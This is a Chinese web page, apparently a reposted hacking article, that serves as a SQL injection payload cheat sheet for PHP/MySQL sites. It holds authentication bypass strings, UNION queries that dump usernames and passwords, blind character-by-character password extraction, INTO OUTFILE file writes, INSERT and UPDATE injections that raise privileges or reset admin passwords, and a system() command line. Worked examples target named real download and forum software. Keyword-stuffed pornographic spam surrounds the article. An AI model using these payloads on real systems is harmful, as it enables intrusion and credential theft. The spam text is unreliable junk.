国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

PHP注射一路小跑
2005-12-17   

php注射庫 
' or 1=1 
' or '1=1 
'/* 
'%23 
' and password='mypass 
id=-1 union select 1,1,1 
id=-1 union select char(97),char(97),char(97) 
id=1 union select 1,1,1 from members 
id=1 union select 1,1,1 from admin 
id=1 union select 1,1,1 from user 
userid=1 and password=mypass 
userid=1 and mid(password,3,1)=char(112) 
userid=1 and mid(password,4,1)=char(97) 
and ord(mid(password,3,1))>111 (ord函數很好用,可以返回整形的) 
' and LENGTH(password)='6(探測密碼長度) 
' and LEFT(password,1)='m 
' and LEFT(password,2)='my 
…………………………依次類推 
' union select 1,username,password from user/* 
' union select 1,username,password from user/* 
=' union select 1,username,password from user/* (可以是1或者=后直接跟) 
99999' union select 1,username,password from user/* 
' into outfile 'c:/file.txt (導出文件) 
=' or 1=1 into outfile 'c:/file.txt 
1' union select 1,username,password from user into outfile 'c:/user.txt 
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt' 
id=' union select 1,username,password from user into outfile 
id=-1 union select 1,database(),version() (靈活應用查詢) 
常用查詢測試語句, 
select * FROM table where 1=1 
select * FROM table where 'uuu'='uuu' 
select * FROM table where 1<>2 
select * FROM table where 3>2 
select * FROM table where 2<3 
select * FROM table where 1 
select * FROM table where 1+1 
select * FROM table where 1--1 
select * FROM table where ISNULL(NULL) 
select * FROM table where ISNULL(COT(0)) 
select * FROM table where 1 IS NOT NULL 
select * FROM table where NULL IS NULL 
select * FROM table where 2 BETWEEN 1 AND 3 
select * FROM table where 'b' BETWEEN 'a' AND 'c' 
select * FROM table where 2 IN (0,1,2) 
select * FROM table where CASE WHEN 1>0 THEN 1 END 
例如:夜貓下載系統1.0版本 
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user 
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1 
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替換,尋找密碼) 
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (驗證第一位密碼) 
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位) 
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51 
………………………………………………………… 
例如2:灰色軌跡 變換id進行測試(meteor) 
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate 
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate 
構造語句: 
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) 
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1) 
union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate 
union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate 
union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate (查沙子的id) 
(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10) 
select * FROM article where articleid='$id' union select * FROM……(字段和數據庫相同情況下,可直接提交) 
select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……(不同的情況下) 
特殊技巧:在表單,搜索引擎等地方寫: 
"___" 
".__ " 
"% 
%' ORDER BY articleid/* 
%' ORDER BY articleid# 
__' ORDER BY articleid/* 
__' ORDER BY articleid# 
$command = "dir c:\";system($command); 
select * FROM article where articleid='$id' 
select * FROM article where articleid=$id 
1' and 1=2 union select * from user where userid=1/* 句中變為 
(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*') 
1 and 1=2 union select * from user where userid=1 
語句形式:建立一個庫,插入: 
create DATABASE `injection` 
create TABLE `user` ( 
`userid` int(11) NOT NULL auto_increment, 
`username` varchar(20) NOT NULL default '', 
`password` varchar(20) NOT NULL default '', 
PRIMARY KEY (`userid`) 
) ; 
insert INTO `user` VALUES (1, 'swap', 'mypass'); 
插如一個注冊用戶: 
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); 
"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"; 
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1') 
"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"; 
insert INTO membres SET login='',password='',nom='',userlevel='3',email='' 
"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"; 
update user SET password='$password', homepage='$homepage' where id='$id' 
update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id' 
"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"; 
update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]' 
"update news SET Votes=Votes+1, score=score+$note where idnews='$id'"; 
長用函數: 
DATABASE() 
USER() 
SYSTEM_USER() 
SESSION_USER() 
CURRENT_USER() 
比如: 
update article SET title=$title where articleid=1 對應函數 
update article SET title=DATABASE() where id=1 
#把當前數據庫名更新到title字段 
update article SET title=USER() where id=1 
#把當前 MySQL 用戶名更新到title字段 
update article SET title=SYSTEM_USER() where id=1 
#把當前 MySQL 用戶名更新到title字段 
update article SET title=SESSION_USER() where id=1 
#把當前 MySQL 用戶名更新到title字段 
update article SET title=CURRENT_USER() where id=1 
#把當前會話被驗證匹配的用戶名更新到title字段 
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 
$req = "select * FROM membres where name like '%$search%' ORDER BY name"; 
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name 
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name 
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (經典) 
select uid FROM admins where login='' OR admin_level=1#' AND password='' 
select * FROM table where msg like '%hop' 
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password='' 
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name

熱詞搜索:

上一篇:webshell給六合彩網站毀滅性的打擊
下一篇:MSSQL注入攻擊服務器與防護

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国精品**一区二区三区在线蜜桃| 中文字幕精品一区二区三区精品| 精品国产乱码久久久久久久| 久久国内精品视频| 精品久久99ma| 懂色av一区二区在线播放| 中文字幕成人av| 欧美性大战久久久久久久蜜臀| 午夜精品一区在线观看| www国产成人免费观看视频 深夜成人网| 精品一区二区三区免费视频| 国产清纯白嫩初高生在线观看91 | 成人黄色免费短视频| 一区二区三区影院| 精品1区2区在线观看| 91香蕉视频mp4| 精品一区二区三区在线视频| 亚洲视频你懂的| 日韩欧美在线影院| 色诱亚洲精品久久久久久| 久久电影网电视剧免费观看| 亚洲精品乱码久久久久久日本蜜臀| 8v天堂国产在线一区二区| 成人动漫精品一区二区| 久99久精品视频免费观看| 亚洲综合视频在线观看| 国产日韩欧美一区二区三区乱码| 欧美卡1卡2卡| 在线观看日韩av先锋影音电影院| 国产一区二区h| 免费高清不卡av| 亚洲一级二级三级| 亚洲色图制服诱惑| 国产精品热久久久久夜色精品三区| 精品剧情v国产在线观看在线| 色乱码一区二区三区88| 成人av网站在线| 国产精品综合一区二区| 美女在线一区二区| 日韩电影在线观看电影| 午夜视频在线观看一区二区| 亚洲精品免费视频| 亚洲欧美日韩中文播放| 国产精品国产自产拍高清av王其| 精品国产欧美一区二区| 精品三级在线观看| 日韩欧美久久一区| 欧美一区二区三区男人的天堂| 欧美午夜一区二区三区 | 波多野结衣中文字幕一区二区三区| 麻豆精品蜜桃视频网站| 日本美女一区二区三区| 视频一区视频二区中文| 男人操女人的视频在线观看欧美| 视频一区欧美精品| 麻豆成人在线观看| 国模少妇一区二区三区| 国产成人综合在线观看| 成人精品国产福利| 色域天天综合网| 欧美乱妇15p| 91麻豆精品国产自产在线 | 香蕉成人伊视频在线观看| 一区二区在线免费| 亚洲图片欧美视频| 日韩福利电影在线| 精品一区二区三区蜜桃| 国产99久久久精品| 色综合天天综合网国产成人综合天| 色女孩综合影院| 宅男在线国产精品| 欧美激情综合五月色丁香| 综合久久久久久| 亚洲18女电影在线观看| 精品亚洲aⅴ乱码一区二区三区| 国产毛片精品国产一区二区三区| 成人ar影院免费观看视频| 色噜噜狠狠成人网p站| 日韩欧美一区二区免费| 国产精品久久久久久久久图文区| 亚洲综合视频网| 国产精品99久久久久久久女警 | 成人精品高清在线| 欧美精品三级在线观看| 国产日韩视频一区二区三区| 亚洲一区二区三区四区五区黄| 蜜臂av日日欢夜夜爽一区| 99精品久久99久久久久| 欧美日韩二区三区| 中文字幕免费不卡在线| 日本午夜一本久久久综合| 成人黄色a**站在线观看| 6080午夜不卡| 亚洲免费在线视频一区 二区| 精品制服美女丁香| 精品视频在线免费观看| 中文字幕亚洲成人| 国产一区二区三区四区五区入口| 欧美三日本三级三级在线播放| 国产日韩精品一区二区三区在线| 亚洲成人在线免费| 不卡视频一二三四| 久久精品欧美一区二区三区不卡 | 久久成人18免费观看| 91高清视频在线| 亚洲国产成人私人影院tom | 色拍拍在线精品视频8848| 国产亚洲精久久久久久| 亚洲成av人片在线观看无码| 成人国产视频在线观看| 久久亚洲免费视频| 免费观看一级欧美片| 欧美午夜一区二区三区| 一区av在线播放| 91麻豆自制传媒国产之光| 国产精品国产三级国产aⅴ入口| 精品一区二区免费| 欧美成人三级在线| 麻豆高清免费国产一区| 欧美xingq一区二区| 麻豆中文一区二区| 91麻豆精品国产91久久久资源速度 | 亚洲18色成人| 欧美色视频在线| 亚洲一卡二卡三卡四卡| 91成人免费在线| 亚洲综合区在线| 91福利在线看| 五月婷婷欧美视频| 欧美精品粉嫩高潮一区二区| 日本午夜一本久久久综合| 56国语精品自产拍在线观看| 日韩精品欧美精品| 日韩一级片在线播放| 久久99精品久久久久久久久久久久 | 久久久欧美精品sm网站| 国产精品一级二级三级| 久久九九影视网| 99re免费视频精品全部| 亚洲欧洲中文日韩久久av乱码| 色拍拍在线精品视频8848| 婷婷综合五月天| 欧美va亚洲va香蕉在线| 国产成人av福利| 亚洲摸摸操操av| 日韩欧美在线一区二区三区| 国产91在线看| 有坂深雪av一区二区精品| 欧美一级二级三级蜜桃| 国产高清在线观看免费不卡| 中文字幕不卡的av| 欧美日韩亚洲高清一区二区| 久久国产精品色| 中文字幕制服丝袜成人av| 在线观看91精品国产入口| 蜜桃一区二区三区在线观看| 欧美激情一区在线| 欧美日韩mp4| 国产成人综合网| 亚洲高清在线精品| 久久久久久久综合色一本| 一本一道综合狠狠老| 久久精品国产77777蜜臀| 综合色天天鬼久久鬼色| 欧美videossexotv100| 91国偷自产一区二区三区成为亚洲经典| 蜜臀av在线播放一区二区三区| 国产精品色噜噜| 欧美一区二区三区人| 色欧美片视频在线观看在线视频| 狠狠色狠狠色综合系列| 亚洲一区在线电影| 国产精品沙发午睡系列990531| 欧美一区二区私人影院日本| 91片黄在线观看| 国产jizzjizz一区二区| 毛片基地黄久久久久久天堂| 亚洲五月六月丁香激情| 亚洲人成电影网站色mp4| 欧美国产综合一区二区| 日韩欧美国产高清| 欧美日韩一区高清| 91麻豆免费看| kk眼镜猥琐国模调教系列一区二区| 久久精品国产精品亚洲红杏| 婷婷久久综合九色国产成人| 悠悠色在线精品| 亚洲人成电影网站色mp4| 国产精品久久久久四虎| 国产亚洲精品bt天堂精选| 精品国产第一区二区三区观看体验| 精品视频一区 二区 三区| 91蝌蚪国产九色| 91色porny| 91麻豆国产在线观看| 99re这里只有精品视频首页| 波多野结衣中文字幕一区| av一区二区久久| 91日韩精品一区| 欧美最新大片在线看|